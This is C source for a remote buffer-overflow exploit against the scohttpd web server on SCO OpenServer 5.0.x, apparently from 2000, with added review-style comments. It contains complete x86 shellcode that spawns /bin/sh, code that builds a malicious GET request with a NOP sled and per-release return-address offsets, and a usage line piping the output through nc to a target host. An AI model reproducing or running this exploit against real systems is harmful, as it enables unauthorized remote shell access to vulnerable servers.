/*
 * <scohttpx.c> Remote exploit
 *
 * Offset: /var/scohttp/scohttpd 
 * 0 -> OpenServer 5.0.4
 * 0 -> OpenServer 5.0.2
 * 600 -> OpenServer 5.0.5
 *
 * scosysv:~# /var/scohttp/scohttpd -v
 * scohttpd version NCSA/1.3.
 *
 * Usage: 
 * $ cc scohttpx.c -o scohttpx
 * $ (scohttpx 0;cat) | nc 1.1.1.1 457
 */ 

#include <stdlib.h>
#include <stdio.h>

/*
 * Hard-coded payload bytes. main() copies this string into the request
 * body with memcpy(buf+140, hell, strlen(hell)); the copy length therefore
 * depends on the array containing no embedded NUL before the terminator,
 * which is the case for the bytes below (the payload patches in its own
 * zero bytes at runtime via the three stores to 0x7/0x0c/0x11(%esi)).
 *
 * The right-hand annotations are the original author's disassembly of the
 * x86 bytes; they are kept as-is apart from one corrected mnemonic.
 * From a detection standpoint, the literal "/bin/sh" and the far-call
 * byte sequence 0x9a .. 0x07 on the last line appear verbatim in the
 * emitted request, since the emitter does no encoding.
 */
char hell[]=
  "\xeb\x1b"       // start: jmp uno 
  "\x5e"           // dos: popl %esi
  "\x31\xdb"       // xorl %ebx,%ebx
  "\x89\x5e\x07"   // movl %ebx,0x7(%esi)  (opcode 0x89 = 32-bit store, same as next line; not movb)
  "\x89\x5e\x0c"   // movl %ebx,0x0c(%esi)
  "\x88\x5e\x11"   // movb %bl,0x11(%esi)
  "\x31\xc0"       // xorl %eax,%eax
  "\xb0\x3b"       // movb $0x3b,%al
  "\x8d\x7e\x07"   // leal 0x07(%esi),%edi
  "\x89\xf9"       // movl %edi,%ecx
  "\x53"           // pushl %ebx
  "\x51"           // pushl %ecx
  "\x56"           // pushl %esi
  "\x56"           // pushl %esi
  "\xeb\x10"       // jmp execve
  "\xe8\xe0\xff\xff\xff"          // uno: call dos
  "/bin/sh"
  "\xaa\xaa\xaa\xaa"
  "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 

#define OFF 0x803d688             // SCO OpenServer 5.0.4 base value; argv[1] (per-release offset listed in the file header) is added to it in main()
#define ALINEA 3                  // alignment fudge: the repeated 4-byte stores start at index 200+ALINEA = 203 of buf
#define LEN 400                   // size in bytes of the request body emitted after "GET "
                       
/*
 * Entry point. Builds one LEN-byte request body in buf and writes
 * "GET " + body + '\n' to stdout; the usage line in the file header pipes
 * that output into nc.
 *
 * argv[1] is parsed with atoi() and added to OFF. There is no validation:
 * a non-numeric argument silently becomes offset 0, and the usage error
 * path exits with status 0 rather than a non-zero code.
 *
 * Layout of buf, by index:
 *   [0, LEN)                 filled with 0x90 (x86 NOP)
 *   [140, 140+strlen(hell))  the payload bytes from hell[]
 *   [203, LEN-4) step 4      the 32-bit value OFF+offset, stored through an
 *                            int* cast; these stores are not 4-byte aligned
 *                            relative to buf and violate strict aliasing
 *                            (tolerated by the x86 compiler this targeted).
 *
 * NOTE(review): memset, memcpy and strlen are used without <string.h>, so
 * this relies on implicit function declarations; modern compilers warn or
 * reject that.
 */
int main(int argc, char *argv[]) {
  int offset=0;
  char buf[LEN];
  int i;

  if(argc < 2) {
    printf("Usage: scohttpx <offset>\n");
    exit(0);  // usage error still reports success to the shell
  }
  else {
    offset=atoi(argv[1]);  // no range/format check on the argument
  }

  memset(buf,0x90,LEN);                  // fill: 0x90
  memcpy(buf+140,hell,strlen(hell));     // payload at index 140; strlen stops at the array's terminating NUL
  for(i=200+ALINEA;i<LEN-4;i+=4)
    *(int *)&buf[i]=OFF+offset;          // last store is at i=395, covering buf[395..398]

  printf("GET ");

  for(i=0;i<LEN;i++)
    putchar(buf[i]);                     // raw bytes, no escaping; putchar converts to unsigned char

  putchar('\n');
  exit(0);
}
/*                   www.hack.co.za   [26 September 2000]*/